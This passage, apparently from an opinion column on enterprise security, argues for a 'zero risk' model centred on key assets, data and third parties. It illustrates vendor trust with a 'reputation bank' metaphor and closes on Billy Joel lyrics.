Here is a better idea: RSA CTO Zulfikar Ramzan advocates replacing the zero trust model with one that focuses on managing zero risk. That gets IT staffs to examine what is really important: identifying key IT assets, data, and third parties, and focusing their energies on securing those. He mentioned in this video interview that “if digital transformation is the rocket ship, then trust has to be the fuel for that rocket ship.”

Using this zero-risk model changes the conversation from building roads to looking more carefully at the business itself: what apps we will need to deliver business services, how proprietary data will be stored and protected, and who will have access to what based on business needs. How many of you can certify with complete confidence that every user in your Active Directory is still a legitimate and current employee? I don’t see too many hands raised, which proves my point.

Tom Wolfe wrote in his 1987 novel, The Bonfire of the Vanities, about a concept called “the favor bank.” This means we all make deposits, as favors, in the hope of making future withdrawals when we need them. Rohit used a variation in his speech he called the “reputation bank,” where companies make deposits of trustworthy moments to balance those dark times when they need to make their own withdrawals. I like the concept, because it gets across that trust is a two-way street. I will give up my email to you if I get some benefit in return. Vendors that understand how the reputation bank works will earn interest and our trust; those that lie about their privacy policies will overdraw their accounts.

To conclude things, I turn to that great security authority, Billy Joel, who once said it best:

It took a lot for you to not lose your faith in this world

I can’t offer you proof

But you’re going to face a moment of truth …

It only is a matter of trust.